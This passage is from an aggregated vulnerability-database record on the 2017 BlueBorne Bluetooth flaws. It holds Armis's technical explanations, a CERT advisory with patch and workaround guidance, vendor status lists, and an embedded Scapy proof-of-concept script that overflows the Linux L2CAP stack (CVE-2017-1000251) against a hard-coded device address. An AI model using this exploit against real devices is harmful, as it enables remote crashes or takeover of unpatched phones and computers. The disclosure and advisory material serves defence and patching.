(CVE-2017-8628).\r\n\r\nMicrosoft is issuing security patches to all supported Windows versions at 10 AM, Tuesday, September 12. We recommend that Windows users should check with the Microsoft release here for the latest information.\r\n\r\n##### Linux\r\nLinux is the underlying operating system for a wide range of devices. The most commercial, and consumer-oriented platform based on Linux is the Tizen OS.\r\n\r\n* All Linux devices running BlueZ are affected by the information leak vulnerability (CVE-2017-1000250).\r\n* All Linux devices from version 3.3-rc1 (released in October 2011) are affected by the remote code execution vulnerability (CVE-2017-1000251).\r\n\r\nExamples of impacted devices:\r\n\r\n* Samsung Gear S3 (Smartwatch)\r\n* Samsung Smart TVs\r\n* Samsung Family Hub (Smart refrigerator)\r\n\r\nInformation on Linux updates will be provided as soon as they are live.\r\n\r\n##### iOS\r\nAll iPhone, iPad and iPod touch devices with iOS 9.3.5 and lower, and AppleTV devices with version 7.2.2 and lower are affected by the remote code execution vulnerability. This vulnerability was already mitigated by Apple in iOS 10, so no new patch is needed to mitigate it. We recommend you upgrade to the latest iOS or tvOS available.\r\n\r\nIf you are concerned that your device may not be patched, we recommend disabling Bluetooth, and minimizing its use until you can confirm a patch is issued and installed on your device.\r\n\r\n### Technical Overview\r\n\r\n#### BlueBorne Explained: How The Attack Vector Works\r\n\r\nThe BlueBorne attack vector has several stages. First, the attacker locates active Bluetooth connections around him or her. Devices can be identified even if they are not set to \u201cdiscoverable\u201d mode. Next, the attacker obtains the device\u2019s MAC address, which is a unique identifier of that specific device. By probing the device, the attacker can determine which operating system his victim is using, and adjust his exploit accordingly. The attacker will then exploit a vulnerability in the implementation of the Bluetooth protocol in the relevant platform and gain the access he needs to act on his malicious objective. At this stage the attacker can choose to create a Man-in-The-Middle attack and control the device\u2019s communication, or take full control over the device and use it for a wide array of cybercriminal purposes.\r\n\r\n[Download our Technical White Paper on BlueBorne](http://go.armis.com/blueborne-technical-paper)\r\n\r\n#### BlueBorne attack on Android\r\nOnce the attacker determined his target is using the Android operating system, he can use four of the vulnerabilities disclosed by Armis to exploit the device, or they can use a separate vulnerability to conduct a Man-in-The-Middle attack.\r\n\r\nHere is a quick demo of how BlueBorne can take control of an Android device:\r\nhttps://youtu.be/Az-l90RCns8\r\n\r\n##### Information Leak Vulnerability (CVE-2017-0785)\r\nThe first vulnerability in the Android operating system reveals valuable information which helps the attacker leverage one of the remote code execution vulnerabilities described below. The vulnerability was found in the SDP (Service Discovery Protocol) server, which enables the device to identify other Bluetooth services around it. The flaw allows the attacker to send a set of crafted requests to the server, causing it to disclose memory bits in response. These pieces of information can later be used by the attacker to overcome advanced security measures and take control over the device. This vulnerability can also allow an attacker to leak encryption keys from the targeted device and eavesdrop on Bluetooth communications, in an attack that very much resembles heartbleed.\r\n\r\n##### Remote Code Execution Vulnerability #1 (CVE-2017-0781)\r\nThis vulnerability resides in the Bluetooth Network Encapsulation Protocol (BNEP) service, which enables internet sharing over a Bluetooth connection (tethering). Due to a flaw in the BNEP service, a hacker can trigger a surgical memory corruption, which is easy to exploit and enables him to run code on the device, effectively granting him complete control. Due to lack of proper authorization validations, triggering this vulnerability does not require any user interaction, authentication or pairing, so the targeted user is completely unaware of an ongoing attack.\r\n\r\n##### Remote Code Execution vulnerability #2 (CVE-2017-0782)\r\nThis vulnerability is similar to the previous one, but resides in a higher level of the BNEP service \u2013 the Personal Area Networking (PAN) profile \u2013 which is responsible for establishing an IP based network connection between two devices. In this case, the memory corruption is larger, but can still be leveraged by an attacker to gain full control over the infected device. Similar to the previous vulnerability, this vulnerability can also be triggered without any user interaction, authentication or pairing.\r\n\r\n##### The Bluetooth Pineapple \u2013 Man in The Middle attack (CVE-2017-0783)\r\nMan-in-The-Middle (MiTM) attacks allow the attacker to intercept and intervene in all data going to or from the targeted device. To create a MiTM attack using Wi-Fi, the attacker requires both special equipment, and a connection request from the targeted device to an open WiFi network. In Bluetooth, the attacker can actively engage his target, using any device with Bluetooth capabilities. The vulnerability resides in the PAN profile of the Bluetooth stack, and enables the attacker to create a malicious network interface on the victim\u2019s device, re-configure IP routing and force the device to transmit all communication through the malicious network interface. This attack does not require any user interaction, authentication or pairing, making it practically invisible.\r\n\r\n#### BlueBorne attack on Windows\r\nWe have disclosed a vulnerability in Windows which allows an attacker to conduct a Man-in-The-Middle attack.\r\n\r\nHere is a quick demo of how BlueBorne can take create a MiTM attack:\r\nhttps://youtu.be/QrHbZPO9Rnc\r\n\r\n##### The Bluetooth Pineapple #2 \u2013 Man in The Middle attack (CVE-2017-8628)\r\n\r\nThis vulnerability is identical to the one found in the Android operating system, and affects both systems since they shared the same principals in implementing some of the Bluetooth protocol. The vulnerability resides in the Bluetooth stack, and enables the attacker to create a malicious network interface on the victim\u2019s device, re-configure IP routing and force the device to transmit all communication through it. This attack does not require any user interaction, authentication or pairing, making it also practically invisible.\r\n\r\n#### BlueBorne attack on Linux\r\nArmis has disclosed two vulnerabilities in the Linux operating system which allow attackers to take complete control over infected devices. The first is an information leak vulnerability, which can help the attacker determine the exact version used by the targeted device and adjust his exploit accordingly. The second is a stack overflow with can lead to full control of a device.\r\n\r\nHere is a quick demo of how BlueBorne can take over a Linux device:\r\nhttps://youtu.be/U7mWeKhd_-A\r\n\r\n##### Information leak vulnerability (CVE-2017-1000250)\r\n\r\nSimilar to the information leak vulnerability in Android, this vulnerability resides in the SDP server responsible for identifying other services using Bluetooth around the device. The flaw allows the attacker to send a set of crafted requests to the server, causing it to disclose memory bits in response. This can be used by an attacker to expose sensitive data from the Bluetooth processthat may also contain encryption keys of Bluetooth communications. These can be used by the attacker to initiate an attack that very much resembles heartbleed.\r\n\r\n##### A stack overflow in BlueZ (CVE-2017-1000251)\r\n\r\nThis vulnerability was found in the Bluetooth stack of the Linux Kernel, which is the very core of the operating system. An internal flaw in the L2CAP (Logical Link Control and Adaptation Protocol) that is used to connect between two devices causes a memory corruption. An attacker can use this memory corruption to gain full control of the device.\r\n\r\n#### BlueBorne attack on iOS\r\nThis vulnerability found by Armis was disclosed to Apple. Since it was mitigated in iOS version 10 and Apple TV version above 7.2.2, a full exploit was not developed to demonstrate how this vulnerability can be leveraged for gaining full control of an iOS device. However, this vulnerability still poses great risk to any iOS device prior to version 10, as it is does not require any interaction from the users, or configuration of any sort on the targeted device. The vulnerability can be leveraged by an attacker to gain remote code execution in a high-privileged context (the Bluetooth process).\r\n\r\n##### Remote code execution via Apple\u2019s Low Energy Audio Protocol\r\n\r\nThis vulnerability was found in a new protocol Apple has invented, which operates on top of Bluetooth, called LEAP (Low energy audio protocol). The protocol is designed to stream audio to low energy audio peripherals (such as low energy headsets, or the Siri Remote). This enables devices that only have Bluetooth Low Energy to stream audio and send audio commands. Due to a flaw in the implementation of LEAP, a large audio command can be sent to a targeted device and lead to a memory corruption. Since the audio commands sent via LEAP are not properly validated, an attacker can use the memory corruption to gain full control of the device.\r\n\r\n### Securing against BlueBorne\r\n\r\nVulnerabilities that can spread over the air and between devices pose a tremendous threat to any organization or individual. Current security measures, including endpoint protection, mobile data management, firewalls, and network security solution are not designed to identify these type of attacks, and related vulnerabilities and exploits, as their main focus is to block attacks that can spread via IP connections.\r\n\r\nNew solutions are needed to address the new airborne attack vector, especially those that make air gapping irrelevant. Additionally, there will need to be more attention and research as new protocols are using for consumers and businesses alike. With the large number of desktop, mobile, and IoT devices only increasing, it is critical we can ensure these types of vulnerabilities are not exploited. This is the primary mission of Armis in this new connected age.", "published": "2017-09-13T00:00:00", "type": "seebug", "title": "The IoT Attack Vector \u201cBlueBorne\u201d Exposes Almost Every Connected Device\n (BlueBorne)", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-0781", "CVE-2017-0782", "CVE-2017-0783", "CVE-2017-0785", "CVE-2017-1000250", "CVE-2017-1000251", "CVE-2017-8628"], "modified": "2017-09-13T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-96467", "id": "SSV:96467", "sourceData": "\n ## 1) Install Scapy ##\r\n\r\n[https://github.com/secdev/scapy](https://github.com/secdev/scapy)\r\n\r\n\r\nAdd/Replace these requests and responses in Bluetooth Protocol stack to these:\r\n\r\n\r\nscapy/layers/bluetooth.py\r\n\r\n\tclass L2CAP_ConfReq(Packet):\r\n\t name = \"L2CAP Conf Req\"\r\n\t fields_desc = [ LEShortField(\"dcid\",0),\r\n\t LEShortField(\"flags\",0),\r\n\t ByteField(\"type\",0),\r\n\t ByteField(\"length\",0),\r\n\t ByteField(\"identifier\",0),\r\n\t ByteField(\"servicetype\",0),\r\n\t LEShortField(\"sdusize\",0),\r\n\t LEIntField(\"sduarrtime\",0),\r\n\t LEIntField(\"accesslat\",0),\r\n\t LEIntField(\"flushtime\",0),\r\n\t ]\r\n\t\r\n\t\r\n\t\r\n\tclass L2CAP_ConfResp(Packet):\r\n\t name = \"L2CAP Conf Resp\"\r\n\t fields_desc = [ LEShortField(\"scid\",0),\r\n\t LEShortField(\"flags\",0),\r\n\t LEShortField(\"result\",0),\r\n\t ByteField(\"type0\",0),\r\n\t ByteField(\"length0\",0),\r\n\t LEShortField(\"option0\",0),\r\n\t ByteField(\"type1\",0),\r\n\t ByteField(\"length1\",0),\r\n\t LEShortField(\"option1\",0),\r\n\t ByteField(\"type2\",0),\r\n\t ByteField(\"length2\",0),\r\n\t LEShortField(\"option2\",0),\r\n\t ByteField(\"type3\",0),\r\n\t ByteField(\"length3\",0),\r\n\t LEShortField(\"option3\",0),\r\n\t ByteField(\"type4\",0),\r\n\t ByteField(\"length4\",0),\r\n\t LEShortField(\"option4\",0),\r\n\t ByteField(\"type5\",0),\r\n\t ByteField(\"length5\",0),\r\n\t LEShortField(\"option5\",0),\r\n\t ByteField(\"type6\",0),\r\n\t ByteField(\"length6\",0),\r\n\t LEShortField(\"option6\",0),\r\n\t ByteField(\"type7\",0),\r\n\t ByteField(\"length7\",0),\r\n\t LEShortField(\"option7\",0),\r\n\t ByteField(\"type8\",0),\r\n\t ByteField(\"length8\",0),\r\n\t LEShortField(\"option8\",0),\r\n\t ByteField(\"type9\",0),\r\n\t ByteField(\"length9\",0),\r\n\t LEShortField(\"option9\",0),\r\n\t ByteField(\"type10\",0),\r\n\t ByteField(\"length10\",0),\r\n\t LEShortField(\"option10\",0),\r\n\t ByteField(\"type11\",0),\r\n\t ByteField(\"length11\",0),\r\n\t LEShortField(\"option11\",0),\r\n\t ByteField(\"type12\",0),\r\n\t ByteField(\"length12\",0),\r\n\t LEShortField(\"option12\",0),\r\n\t ByteField(\"type13\",0),\r\n\t ByteField(\"length13\",0),\r\n\t LEShortField(\"option13\",0),\r\n\t ByteField(\"type14\",0),\r\n\t ByteField(\"length14\",0),\r\n\t LEShortField(\"option14\",0),\r\n\t ByteField(\"type15\",0),\r\n\t ByteField(\"length15\",0),\r\n\t LEShortField(\"option15\",0),\r\n\t ByteField(\"type16\",0),\r\n\t ByteField(\"length16\",0),\r\n\t LEShortField(\"option16\",0),\r\n\t ByteField(\"type17\",0),\r\n\t ByteField(\"length17\",0),\r\n\t LEShortField(\"option17\",0),\r\n\t ByteField(\"type18\",0),\r\n\t ByteField(\"length18\",0),\r\n\t LEShortField(\"option18\",0),\r\n\t ByteField(\"type19\",0),\r\n\t ByteField(\"length19\",0),\r\n\t LEShortField(\"option19\",0),\r\n\t ByteField(\"type20\",0),\r\n\t ByteField(\"length20\",0),\r\n\t LEShortField(\"option20\",0),\r\n\t ByteField(\"type21\",0),\r\n\t ByteField(\"length21\",0),\r\n\t LEShortField(\"option21\",0),\r\n\t ByteField(\"type22\",0),\r\n\t ByteField(\"length22\",0),\r\n\t LEShortField(\"option22\",0),\r\n\t ByteField(\"type23\",0),\r\n\t ByteField(\"length23\",0),\r\n\t LEShortField(\"option23\",0),\r\n\t ByteField(\"type24\",0),\r\n\t ByteField(\"length24\",0),\r\n\t LEShortField(\"option24\",0),\r\n\t ByteField(\"type25\",0),\r\n\t ByteField(\"length25\",0),\r\n\t LEShortField(\"option25\",0),\r\n\t ByteField(\"type26\",0),\r\n\t ByteField(\"length26\",0),\r\n\t LEShortField(\"option26\",0),\r\n\t ByteField(\"type27\",0),\r\n\t ByteField(\"length27\",0),\r\n\t LEShortField(\"option27\",0),\r\n\t ByteField(\"type28\",0),\r\n\t ByteField(\"length28\",0),\r\n\t LEShortField(\"option28\",0),\r\n\t ByteField(\"type29\",0),\r\n\t ByteField(\"length29\",0),\r\n\t LEShortField(\"option29\",0),\r\n\t ByteField(\"type30\",0),\r\n\t ByteField(\"length30\",0),\r\n\t LEShortField(\"option30\",0),\r\n\t ByteField(\"type31\",0),\r\n\t ByteField(\"length31\",0),\r\n\t LEShortField(\"option31\",0),\r\n\t ByteField(\"type32\",0),\r\n\t ByteField(\"length32\",0),\r\n\t LEShortField(\"option32\",0),\r\n\t ByteField(\"type33\",0),\r\n\t ByteField(\"length33\",0),\r\n\t LEShortField(\"option33\",0),\r\n\t ByteField(\"type34\",0),\r\n\t ByteField(\"length34\",0),\r\n\t LEShortField(\"option34\",0),\r\n\t ByteField(\"type35\",0),\r\n\t ByteField(\"length35\",0),\r\n\t LEShortField(\"option35\",0),\r\n\t ByteField(\"type36\",0),\r\n\t ByteField(\"length36\",0),\r\n\t LEShortField(\"option36\",0),\r\n\t ByteField(\"type37\",0),\r\n\t ByteField(\"length37\",0),\r\n\t LEShortField(\"option37\",0),\r\n\t ByteField(\"type38\",0),\r\n\t ByteField(\"length38\",0),\r\n\t LEShortField(\"option38\",0),\r\n\t ByteField(\"type39\",0),\r\n\t ByteField(\"length39\",0),\r\n\t LEShortField(\"option39\",0),\r\n\t ByteField(\"type40\",0),\r\n\t ByteField(\"length40\",0),\r\n\t LEShortField(\"option40\",0),\r\n\t ByteField(\"type41\",0),\r\n\t ByteField(\"length41\",0),\r\n\t LEShortField(\"option41\",0),\r\n\t ByteField(\"type42\",0),\r\n\t ByteField(\"length42\",0),\r\n\t LEShortField(\"option42\",0),\r\n\t ByteField(\"type43\",0),\r\n\t ByteField(\"length43\",0),\r\n\t LEShortField(\"option43\",0),\r\n\t ByteField(\"type44\",0),\r\n\t ByteField(\"length44\",0),\r\n\t LEShortField(\"option44\",0),\r\n\t ByteField(\"type45\",0),\r\n\t ByteField(\"length45\",0),\r\n\t LEShortField(\"option45\",0),\r\n\t ByteField(\"type46\",0),\r\n\t ByteField(\"length46\",0),\r\n\t LEShortField(\"option46\",0),\r\n\t ByteField(\"type47\",0),\r\n\t ByteField(\"length47\",0),\r\n\t LEShortField(\"option47\",0),\r\n\t ByteField(\"type48\",0),\r\n\t ByteField(\"length48\",0),\r\n\t LEShortField(\"option48\",0),\r\n\t ByteField(\"type49\",0),\r\n\t ByteField(\"length49\",0),\r\n\t LEShortField(\"option49\",0),\r\n\t ByteField(\"type50\",0),\r\n\t ByteField(\"length50\",0),\r\n\t LEShortField(\"option50\",0),\r\n\t ByteField(\"type51\",0),\r\n\t ByteField(\"length51\",0),\r\n\t LEShortField(\"option51\",0),\r\n\t ByteField(\"type52\",0),\r\n\t ByteField(\"length52\",0),\r\n\t LEShortField(\"option52\",0),\r\n\t ByteField(\"type53\",0),\r\n\t ByteField(\"length53\",0),\r\n\t LEShortField(\"option53\",0),\r\n\t ByteField(\"type54\",0),\r\n\t ByteField(\"length54\",0),\r\n\t LEShortField(\"option54\",0),\r\n\t ByteField(\"type55\",0),\r\n\t ByteField(\"length55\",0),\r\n\t LEShortField(\"option55\",0),\r\n\t ByteField(\"type56\",0),\r\n\t ByteField(\"length56\",0),\r\n\t LEShortField(\"option56\",0),\r\n\t ByteField(\"type57\",0),\r\n\t ByteField(\"length57\",0),\r\n\t LEShortField(\"option57\",0),\r\n\t ByteField(\"type58\",0),\r\n\t ByteField(\"length58\",0),\r\n\t LEShortField(\"option58\",0),\r\n\t ByteField(\"type59\",0),\r\n\t ByteField(\"length59\",0),\r\n\t LEShortField(\"option59\",0),\r\n\t ByteField(\"type60\",0),\r\n\t ByteField(\"length60\",0),\r\n\t LEShortField(\"option60\",0),\r\n\t ByteField(\"type61\",0),\r\n\t ByteField(\"length61\",0),\r\n\t LEShortField(\"option61\",0),\r\n\t ByteField(\"type62\",0),\r\n\t ByteField(\"length62\",0),\r\n\t LEShortField(\"option62\",0),\r\n\t ByteField(\"type63\",0),\r\n\t ByteField(\"length63\",0),\r\n\t LEShortField(\"option63\",0),\r\n\t ByteField(\"type64\",0),\r\n\t ByteField(\"length64\",0),\r\n\t LEShortField(\"option64\",0),\r\n\t ByteField(\"type65\",0),\r\n\t ByteField(\"length65\",0),\r\n\t LEShortField(\"option65\",0),\r\n\t ByteField(\"type66\",0),\r\n\t ByteField(\"length66\",0),\r\n\t LEShortField(\"option66\",0),\r\n\t ByteField(\"type67\",0),\r\n\t ByteField(\"length67\",0),\r\n\t LEShortField(\"option67\",0),\r\n\t ByteField(\"type68\",0),\r\n\t ByteField(\"length68\",0),\r\n\t LEShortField(\"option68\",0),\r\n\t ByteField(\"type69\",0),\r\n\t ByteField(\"length69\",0),\r\n\t LEShortField(\"option69\",0),\r\n\t ]\r\n\t\r\n\r\n## 2) Exploit ##\r\n\r\n\r\nbluebornexploit.py\r\n------------------------\r\n\t\r\n\tfrom scapy.all import *\r\n\t\r\n\tpkt = L2CAP_CmdHdr(code=4)/\r\n\tL2CAP_ConfReq(type=0x06,length=16,identifier=1,servicetype=0x0,sdusize=0xffff,sduarrtime=0xffffffff,accesslat=0xffffffff,flushtime=0xffffffff)\r\n\t\r\n\t\r\n\tpkt1 = L2CAP_CmdHdr(code=5)/\r\n\tL2CAP_ConfResp(result=0x04,type0=1,length0=2,option0=2000,type1=1,length1=2,option1=2000,type2=1,length2=2,option2=2000,type3=1,length3=2,option3=2000,type4=1,length4=2,option4=2000,type5=1,length5=2,option5=2000,type6=1,length6=2,option6=2000,type7=1,length7=2,option7=2000,type8=1,length8=2,option8=2000,type9=1,length9=2,option9=2000,type10=1,length10=2,option10=2000,type11=1,length11=2,option11=2000,type12=1,length12=2,option12=2000,type13=1,length13=2,option13=2000,type14=1,length14=2,option14=2000,type15=1,length15=2,option15=2000,type16=1,length16=2,option16=2000,type17=1,length17=2,option17=2000,type18=1,length18=2,option18=2000,type19=1,length19=2,option19=2000,type20=1,length20=2,option20=2000,type21=1,length21=2,option21=2000,type22=1,length22=2,option22=2000,type23=1,length23=2,option23=2000,type24=1,length24=2,option24=2000,type25=1,length25=2,option25=2000,type26=1,length26=2,option26=2000,type27=1,length27=2,option27=2000,type28=1,length28=2,option28=2000,type29=1,length29=2,option29=2000,type30=1,length30=2,option30=2000,type31=1,length31=2,option31=2000,type32=1,length32=2,option32=2000,type33=1,length33=2,option33=2000,type34=1,length34=2,option34=2000,type35=1,length35=2,option35=2000,type36=1,length36=2,option36=2000,type37=1,length37=2,option37=2000,type38=1,length38=2,option38=2000,type39=1,length39=2,option39=2000,type40=1,length40=2,option40=2000,type41=1,length41=2,option41=2000,type42=1,length42=2,option42=2000,type43=1,length43=2,option43=2000,type44=1,length44=2,option44=2000,type45=1,length45=2,option45=2000,type46=1,length46=2,option46=2000,type47=1,length47=2,option47=2000,type48=1,length48=2,option48=2000,type49=1,length49=2,option49=2000,type50=1,length50=2,option50=2000,type51=1,length51=2,option51=2000,type52=1,length52=2,option52=2000,type53=1,length53=2,option53=2000,type54=1,length54=2,option54=2000,type55=1,length55=2,option55=2000,type56=1,length56=2,option56=2000,type57=1,length57=2,option57=2000,type58=1,length58=2,option58=2000,type59=1,length59=2,option59=2000,type60=1,length60=2,option60=2000,type61=1,length61=2,option61=2000,type62=1,length62=2,option62=2000,type63=1,length63=2,option63=2000,type64=1,length64=2,option64=2000,type65=1,length65=2,option65=2000,type66=1,length66=2,option66=2000,type67=1,length67=2,option67=2000,type68=1,length68=2,option68=2000,type69=1,length69=2,option69=2000)\r\n\t\r\n\t\r\n\tbt = BluetoothL2CAPSocket(\"00:1A:7D:DA:71:13\")\r\n\t\r\n\tbt.send(pkt)\r\n\tbt.send(pkt1)\r\n\t\r\n\r\nbluetoothsrv.py\r\n--------------------\r\n\r\n\tfrom scapy.all import *\r\n\t\r\n\tbt = BluetoothL2CAPSocket(\"01:02:03:04:05:06\")\r\n\t\r\n\tbt.recv()\n ", "cvss": {"score": 8.3, "vector": "AV:ADJACENT_NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-96467"}], "cert": [{"lastseen": "2020-09-18T20:41:35", "bulletinFamily": "info", "cvelist": ["CVE-2017-0781", "CVE-2017-0782", "CVE-2017-0783", "CVE-2017-0785", "CVE-2017-1000250", "CVE-2017-1000251", "CVE-2017-14315", "CVE-2017-8628"], "description": "### Overview \n\nA collection of Bluetooth implementation vulnerabilities known as \"BlueBorne\" has been released. These vulnerabilities collectively affect Windows, iOS, and Linux-kernel-based operating systems including Android and Tizen, and may in worst case allow an unauthenticated attacker to perform commands on the device.\n\n### Description \n\nThe following vulnerabilities have been identified in various Bluetooth implementations:\n\n1\\. [**CWE-120**](<http://cwe.mitre.org/data/definitions/120.html>)**: Buffer Copy without Checking Size of Input ('Classic Buffer Overflow')** \\- CVE-2017-1000251 \n \nLinux kernel versions from 3.3-rc1 to present contain a vulnerable implementation of L2CAP EFS within the BlueZ module. The l2cap_parse_conf_rsp function does not properly check then length of the rsp argument prior to unpacking, allowing an attacker to overflow a 64 byte buffer on the kernel stack with an unlimited amount of data crafted to conform to a valid L2CAP response. \n \n2\\. [**CWE-125**](<http://cwe.mitre.org/data/definitions/125.html>)**: Out-of-bounds Read** \\- CVE-2017-1000250 \n \nAll versions of BlueZ for Linux contains a vulnerable implementation of SDP. An attacker may be able to control the continuation state within SDP request packets and cause the SDP server to return an out of bounds read from the response buffer. \n \n3\\. [**CWE-125**](<http://cwe.mitre.org/data/definitions/125.html>)**: Out-of-bounds Read** \\- CVE-2017-0785 \n \nAll versions of Android prior to September 9, 2017 Security Patch level contain a vulnerable implementation of SDP within the Android Bluetooth software stack. An attacker may be able to control the continuation state within SDP request packets and cause the SDP server to return an out of bounds read from the response buffer. While a similar flaw to CVE-2017-1000250, this is a distinct vulnerability in a different software stack. \n \n4\\. [**CWE-122**](<http://cwe.mitre.org/data/definitions/122.html>)**: Heap-based Buffer Overflow** \\- CVE-2017-0781 \n \nIn all versions of Android prior to September 9, 2017 Security Patch level, an incorrect buffer size passed to a memcpy call within the BNEP implementation for Android may allow an attacker to send crafted packets to the device that overflow the heap. \n \n5\\. [**CWE-191**](<http://cwe.mitre.org/data/definitions/191.html>)**: Integer Underflow (Wrap or Wraparound)** \\- CVE-2017-0782 \n \nIn all versions of Android prior to September 9, 2017 Security Patch level, the bnep_process_control_packet function of the BNEP implementation for Android does not properly check the size of rem_len before decrementing, allowing integer underflow and further unsafe processing of attacker-controlled packets. \n \n6\\. [**CWE-122**](<http://cwe.mitre.org/data/definitions/122.html>)**: Heap-based Buffer Overflow**\\- CVE-2017-14315 \n \nApple's Bluetooth Low-Energy Audio Protocol (LEAP) implementation in iOS version 9.3.5 and lower, and AppleTV tvOS version 7.2.2 and lower, does not properly validate the CID for incoming Bluetooth LEAP audio data, which may result in a heap overflow by not properly validating packet size before calling memcpy. An attacker sending \"classic\" (non-low-energy) Bluetooth packets may be able to cause multiple heap overflows resulting in code execution with the Bluetooth stack context. \n \n7 and 8. [**CWE-300**](<http://cwe.mitre.org/data/definitions/300.html>)**: Channel Accessible by Non-Endpoint ('Man-in-the-Middle')** \\- CVE-2017-0783 and CVE-2017-8628 \n \nIncorrect \"Security Level\" requirements in the PAN profile of the Bluetooth implementation may allow an attacker to gain permissions to perform man in the middle attacks on the user. CVE-2017-0783 applies to all versions of Android prior to the September 9, 2017, Security Patch Level, while CVE-2017-8628 applies to a similar flaw in all versions of Windows from Windows Vista to Windows 10. \n \nFor more details, please read [Armis's BlueBorne disclosure website](<https://www.armis.com/blueborne/#/technical>) and Technical White Paper. \n \n--- \n \n### Impact \n\nAn unauthenticated, remote attacker may be able to obtain private information about the device or user, or execute arbitrary code on the device. \n \n--- \n \n### Solution \n\n**Apply an update** \n \nPatches are available in the latest releases of Windows (see [Microsoft bulletin](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8628>)), iOS, the Linux kernel, and Android (see [September 2017 security bulletin](<https://source.android.com/security/bulletin/2017-09-01>)). \n \nCheck with your device manufacturer to determine if firmware updates will be available. \n \nPhones and other mobile devices in the US running Android are likely to see delayed updates, or possibly never receive updates, due to the complexity of the US mobile ecosystem which typically requires manufacturer and carrier support to push updates. \n \nIf an update is not available, affected users should consider the following workaround \n \n--- \n \n**Disable Bluetooth on your device** \n \nAffected users should consider disabling Bluetooth on affected devices if Bluetooth is unused or unnecessary. \n \n--- \n \n### Vendor Information\n\n240311\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. Click here to view vendors.**\n\n### Android Open Source Project Affected\n\nNotified: September 12, 2017 Updated: September 12, 2017 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Apple Affected\n\nNotified: September 12, 2017 Updated: September 12, 2017 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### BlackBerry __ Affected\n\nNotified: September 18, 2017 Updated: September 19, 2017 \n\n**Statement Date: September 19, 2017**\n\n### Status\n\nAffected\n\n### Vendor Statement\n\nFrom the BlackBerry [security notice](<http://support.blackberry.com/kb/articleDetail?articleNumber=000045807&language=en_US>):\n\n\"BlackBerry recommends that all users of BlackBerry powered by Android smartphones should update to the September Security Maintenance release as soon as it is available. \n\nThere is no action necessary for users of BlackBerry 10 or BlackBerry OS smartphones. \n\nBlackBerry recommends keeping server and device operating systems up to date. \n\nQNX customers should contact their Bluetooth stack vendor for guidance.\"\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * [http://support.blackberry.com/kb/articleDetail?articleNumber=000045807&language=en_US](<http://support.blackberry.com/kb/articleDetail?articleNumber=000045807&language=en_US>)\n\n### Google Affected\n\nNotified: September 12, 2017 Updated: September 12, 2017 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Lenovo __ Affected\n\nNotified: September 12, 2017 Updated: September 19, 2017 \n\n**Statement Date: September 19, 2017**\n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nSome Lenovo products are affected; patches are available. Users are encouraged to check [Lenovo Security Advisory LEN-17125](<https://support.lenovo.com/us/en/product_security/LEN-17125>) for details.\n\n### Vendor References\n\n * <https://support.lenovo.com/us/en/product_security/LEN-17125>\n\n### Microsoft Corporation __ Affected\n\nNotified: September 12, 2017 Updated: September 13, 2017 \n\n**Statement Date: September 12, 2017**\n\n### Status\n\nAffected\n\n### Vendor Statement\n\n`Microsoft released security updates on July 11, 2017, and customers who have Windows Update enabled and applied the security updates, are protected automatically.`\n\n### Vendor Information \n\n[`CVE-2017-8628`](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8628>)` describes this vulnerability in affected Microsoft products.`\n\n### Vendor References\n\n * <https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8628>\n\n### Samsung Mobile Affected\n\nNotified: September 12, 2017 Updated: September 12, 2017 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Tizen Affected\n\nNotified: September 12, 2017 Updated: September 12, 2017 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Technicolor __ Not Affected\n\nUpdated: November 08, 2017 \n\n**Statement Date: October 18, 2017**\n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nTechnicolor products are unaffected since most of them do not provide Bluetooth capacity.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Amazon Unknown\n\nNotified: September 12, 2017 Updated: September 12, 2017 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Barnes and Noble Unknown\n\nNotified: September 12, 2017 Updated: September 12, 2017 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### HTC Unknown\n\nNotified: September 12, 2017 Updated: September 12, 2017 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Huawei Technologies Unknown\n\nNotified: September 12, 2017 Updated: September 12, 2017 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Kyocera Communications Unknown\n\nNotified: September 12, 2017 Updated: September 12, 2017 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### LG Electronics Unknown\n\nNotified: September 12, 2017 Updated: September 12, 2017 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Motorola, Inc. Unknown\n\nNotified: September 12, 2017 Updated: September 12, 2017 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Sony Corporation Unknown\n\nNotified: September 12, 2017 Updated: September 12, 